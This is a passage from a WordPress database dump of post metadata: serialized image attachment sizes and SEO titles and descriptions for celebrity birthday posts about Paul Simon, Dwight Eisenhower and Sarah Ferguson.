\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2180,366,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2181,366,'slide_template','default'),(2182,366,'ct_mb_post_bg_color','#42586a'),(2183,366,'_yoast_wpseo_focuskw','Paul Simon'),(2184,366,'_yoast_wpseo_title','Paul Simon\'s Birthday & Facts About His Life'),(2185,366,'_yoast_wpseo_metadesc','Paul Simon is a talented American singer, songwriter, & philanthropist. He started on the path for his passion for music early on. Learn about his journey.'),(2186,366,'_yoast_wpseo_linkdex','98'),(2187,366,'post_views_count','230'),(2188,367,'post_views_count','309'),(2189,370,'_wp_attached_file','2015/10/General-of-the-Army-Dwight-D.-Eisenhower.jpg'),(2190,370,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:575;s:6:\"height\";i:740;s:4:\"file\";s:52:\"2015/10/General-of-the-Army-Dwight-D.-Eisenhower.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:50:\"General-of-the-Army-Dwight-D.-Eisenhower-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:51:\"General-of-the-Army-Dwight-D.-Eisenhower-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-575x385.jpg\";s:5:\"width\";i:575;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-575x486.jpg\";s:5:\"width\";i:575;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-575x580.jpg\";s:5:\"width\";i:575;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:52:\"General-of-the-Army-Dwight-D.-Eisenhower-326x420.jpg\";s:5:\"width\";i:326;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2191,371,'_wp_attached_file','2015/10/Dwight-Eisenhower.jpg'),(2192,371,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:777;s:6:\"height\";i:599;s:4:\"file\";s:29:\"2015/10/Dwight-Eisenhower.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-768x592.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:592;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Dwight-Eisenhower-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Dwight-Eisenhower-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-696x537.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-777x580.jpg\";s:5:\"width\";i:777;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"Dwight-Eisenhower-545x420.jpg\";s:5:\"width\";i:545;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2194,367,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2195,367,'slide_template','default'),(2196,367,'ct_mb_post_bg_color','#42586a'),(2197,367,'_yoast_wpseo_focuskw','Dwight Eisenhower'),(2198,367,'_yoast_wpseo_title','Dwight Eisenhower Birthday & Legacy'),(2199,367,'_yoast_wpseo_metadesc','Dwight Eisenhower was the 34th president of the United States. We\'re celebrating his birthday & the accomplishments he had throughout his lifetime.'),(2200,367,'_yoast_wpseo_linkdex','91'),(2201,372,'_edit_lock','1444664986:6'),(2202,372,'_edit_last','6'),(2203,376,'_wp_attached_file','2015/07/twitter500-150x150.png'),(2204,376,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2015/07/twitter500-150x150.png\";s:5:\"sizes\";a:3:{s:8:\"td_80x60\";a:4:{s:4:\"file\";s:28:\"twitter500-150x150-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:29:\"twitter500-150x150-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:30:\"twitter500-150x150-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2205,377,'_wp_attached_file','2015/07/facebook5001-e1326144910961.png'),(2206,377,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:64;s:6:\"height\";i:64;s:4:\"file\";s:39:\"2015/07/facebook5001-e1326144910961.png\";s:5:\"sizes\";a:1:{s:8:\"td_80x60\";a:4:{s:4:\"file\";s:37:\"facebook5001-e1326144910961-64x60.png\";s:5:\"width\";i:64;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2207,378,'_wp_attached_file','2015/07/11817212_407467352784092_7088324366362359981_n-1.png'),(2208,378,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:60:\"2015/07/11817212_407467352784092_7088324366362359981_n-1.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:58:\"11817212_407467352784092_7088324366362359981_n-1-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:59:\"11817212_407467352784092_7088324366362359981_n-1-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-300x160.png\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:60:\"11817212_407467352784092_7088324366362359981_n-1-300x261.png\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2209,380,'_edit_lock','1485546183:7'),(2210,380,'_edit_last','7'),(2211,381,'_edit_lock','1446213445:6'),(2212,381,'_edit_last','6'),(2213,382,'_wp_attached_file','2015/10/Sarah_Ferguson.jpg'),(2214,382,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:392;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2015/10/Sarah_Ferguson.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Sarah_Ferguson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Sarah_Ferguson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-392x261.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-392x462.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-392x385.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-392x486.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-392x580.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Sarah_Ferguson-274x420.jpg\";s:5:\"width\";i:274;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2215,383,'_wp_attached_file','2015/10/Sarah-Ferguson.jpg'),(2216,383,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:508;s:4:\"file\";s:26:\"2015/10/Sarah-Ferguson.jpg\";s:5:\"sizes\";a:16:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-300x238.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Sarah-Ferguson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Sarah-Ferguson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-640x486.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Sarah-Ferguson-529x420.jpg\";s:5:\"width\";i:529;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2218,381,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2219,381,'slide_template','default'),(2220,381,'ct_mb_post_bg_color','#42586a'),(2221,381,'_yoast_wpseo_focuskw','Sarah Ferguson'),(2222,381,'_yoast_wpseo_title','Sarah Ferguson\'s Birthday & Bio'),(2223,381,'_yoast_wpseo_metadesc','Sarah Ferguson is a very interesting woman. She has had a long and varied career. On top marrying Prince Andrew, she has written books and much more.'),(2224,381,'_yoast_wpseo_linkdex','96'),(2225,381,'post_views_count','341'),(2226,384,'_wp_attached_file','2015/10/aboutus.jpg'),(2227,384,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1152;s:6:\"height\";i:1584;s:4:\"file\";s:19:\"2015/10/aboutus.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"aboutus-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"aboutus-218x300.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"aboutus-768x1056.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1056;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"aboutus-745x1024.jpg\";s:5:\"width\";i:745;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:17:\"aboutus-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:18:\"aboutus-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:19:\"aboutus-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:19:\"aboutus-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:19:\"aboutus-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:19:\"aboutus-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:19:\"aboutus-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:19:\"aboutus-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:19:\"aboutus-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:19:\"aboutus-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:19:\"aboutus-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:19:\"aboutus-696x957.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:19:\"aboutus-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:19:\"aboutus-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:20:\"aboutus-1068x580.jpg\";s:5:\"width\